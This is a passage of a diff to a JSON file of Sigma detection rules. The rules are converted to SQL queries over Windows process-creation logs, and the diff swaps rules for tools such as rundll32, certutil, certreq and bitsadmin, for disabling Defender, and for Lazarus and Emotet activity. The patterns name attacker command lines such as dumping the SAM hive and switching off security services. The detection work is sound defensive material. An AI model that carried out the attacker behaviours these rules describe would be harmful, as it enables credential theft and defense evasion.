'%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntds.yml" + "filename": "proc_creation_win_rundll32_ntlmrelay.yml" }, { - "title": "Potential Emotet Rundll32 Execution", - "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", - "status": "test", - "description": "Detecting Emotet DLL 
loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "author": "FPT.EagleEye", + "title": "HackTool - SharpEvtMute Execution", + "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "status": "experimental", + "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" + "filename": "proc_creation_win_hktl_sharpevtmute.yml" }, { - "title": "Lazarus Group Activity", - "id": "24c4d154-05a4-4b99-b57d-9b977472443a", - "status": "test", - "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "Suspicious Rundll32 Execution With Image Extension", + "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "status": "experimental", + "description": "Detects the execution of Rundll32.exe with 
DLL files masquerading as image files", + "author": "Hieu Tran", "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR 
CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_lazarus_group_activity.yml" + "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" }, { - "title": "Reg Disable Security Service", - "id": "5e95028c-5229-4214-afae-d653d573d0ec", - "status": "experimental", - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", + "title": "New Root Certificate Installed Via Certutil.EXE", + "id": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", + "status": "test", + "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1553.004" ], "falsepositives": [ - "Unknown", - "Other security solution installers" + "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE 
'%DisableScriptScanning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%/addstore%' ESCAPE '\\' OR CommandLine LIKE '%-addstore%' ESCAPE '\\') AND CommandLine LIKE '%root%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_disable_sec_services.yml" + "filename": "proc_creation_win_certutil_certificate_installation.yml" }, { - "title": "WmiPrvSE Spawned PowerShell", - "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "status": "stable", - "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a signe of remote access via WMI", - "author": "Markus Neis @Karneades", + "title": "Suspicious Use of CSharp Interactive Console", + "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", + "status": "test", + "description": "Detects the execution of CSharp interactive console by PowerShell", + "author": "Michael R. (@nahamike01)", "tags": [ "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.t1127" ], "falsepositives": [ - "AppvClient", - "CCM" + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll'))) AND NOT ((CommandLine = 'null') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" ], - "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" + "filename": "proc_creation_win_csi_use_of_csharp_console.yml" }, { - "title": "Suspicious Process Parents", - "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "title": "Conhost Parent Process Executions", + "id": "7dc2dedd-7603-461a-bc13-15803d132355", "status": "experimental", - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (NewProcessName = '')))))" - ], - "filename": "proc_creation_win_susp_parents.yml" - }, - { - "title": "New User Created Via Net.EXE", - "id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", - "status": "test", - "description": "Identifies the creation of local users via the net.exe command.", - "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", + "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", + "author": "omkar72", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate user creation.", - "Better use event IDs for user creation rather than command line rules." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND NOT ((Provider_Name = 'SystemTraceProvider-Process') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND NewProcessName LIKE '%\\\\git.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% show --textconv %' ESCAPE '\\' OR ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (ParentCommandLine LIKE '%C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4%' ESCAPE '\\' AND (CommandLine LIKE '% show --textconv %' ESCAPE '\\' OR CommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND (ParentCommandLine LIKE '% 
cat-file -s %' ESCAPE '\\' OR ParentCommandLine LIKE '%show --textconv%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1''' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4''' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_user_add.yml" + "filename": "proc_creation_win_conhost_susp_child_process.yml" }, { - "title": "Use of W32tm as Timer", - "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "title": "UAC Bypass via Windows Firewall Snap-In Hijack", + "id": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", "status": "experimental", - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "author": "frack113", + "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", + "author": "Tim Rauch", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND 
CommandLine LIKE '%/samples:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%WF.msc%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_w32tm.yml" + "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" }, { - "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "title": "Suspicious Certreq Command to Download", + "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", "status": "experimental", - "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR 
(NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" }, { - "title": "Capture Credentials with Rpcping.exe", - "id": "93671f99-04eb-4ab4-a161-70d446a84003", - "status": "test", - "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", - "author": "Julia Fomina, oscd.community", + "title": "Sysinternals PsService Execution", + "id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", + "status": "experimental", + "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Unlikely" + "Legitimate use of PsService by an administrator" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND 
(NewProcessName LIKE '%\\\\rpcping.exe' ESCAPE '\\' AND (CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/s%' ESCAPE '\\')) AND ((CommandLine LIKE '%-u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%/u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%-t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\') OR (CommandLine LIKE '%/t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'psservice.exe' OR (NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rpcping_credential_capture.yml" + "filename": "proc_creation_win_sysinternals_psservice.yml" }, { - "title": "MMC Spawning Windows Shell", - "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", - "status": "test", - "description": "Detects a Windows command line executable started from MMC", - "author": "Karneades, Swisscom CSIRT", + "title": "Windows Binary Executed From WSL", + "id": "ed825c86-c009-4014-b413-b76003e33d35", + "status": "experimental", + "description": "Detects the execution of Windows binaries from within a WSL instance. 
This could be used to masquerade parent-child relationships", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.003" + "attack.execution", + "attack.defense_evasion", + "attack.t1202" ], - "level": "high", + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName REGEXP '[a-zA-Z]:\\\\' AND CurrentDirectory LIKE '%\\\\\\\\wsl.localhost%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mmc_susp_child_process.yml" + "filename": "proc_creation_win_wsl_windows_binaries_execution.yml" }, { - "title": "Suspicious DumpMinitool Usage", - "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "title": "PUA - DefenderCheck Execution", + "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "status": "experimental", - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. 
It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1027.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') AND ((NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR (CommandLine LIKE '% Full%' ESCAPE '\\' AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" ], - "filename": "proc_creation_win_dumpminitool_susp_execution.yml" + "filename": "proc_creation_win_pua_defendercheck.yml" }, { - "title": "Suspicious Certreq Command to Download", - "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", - "status": "experimental", - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "author": "Christian Burkard (Nextron Systems)", + "title": "Monitoring For Persistence Via BITS", + "id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", + "status": "test", + "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. 
It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", + "author": "Sreeman", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1197" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/SetNotifyCmdLine%' ESCAPE '\\' AND (CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\')) OR (CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/Addfile%' ESCAPE '\\' AND (CommandLine LIKE '%http:%' ESCAPE '\\' OR CommandLine LIKE '%https:%' ESCAPE '\\' OR CommandLine LIKE '%ftp:%' ESCAPE '\\' OR CommandLine LIKE '%ftps:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" + "filename": "proc_creation_win_bitsadmin_potential_persistence.yml" }, { - "title": "Taskmgr as Parent", - "id": "3d7679bd-0c00-440c-97b0-3f204273e6c7", + "title": "HackTool - SILENTTRINITY Stager Execution", + "id": "03552375-cc2c-4883-bbe4-7958d5a980be", "status": "test", - "description": "Detects the creation of a process from Windows task manager", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects SILENTTRINITY stager use via PE metadata", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036" + 
"attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\resmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_taskmgr_susp_child_process.yml" + "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" }, { - "title": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", - "id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", + "title": "VMToolsd Suspicious Child Process", + "id": "5687f942-867b-4578-ade7-1e341c46e99a", "status": "experimental", - "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", - "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "author": "behops, Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002" + "attack.execution", + "attack.persistence", + "attack.t1059" ], "falsepositives": [ - "Inventory tool runs", - "Administrative activity" + "Legitimate use by administrator" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 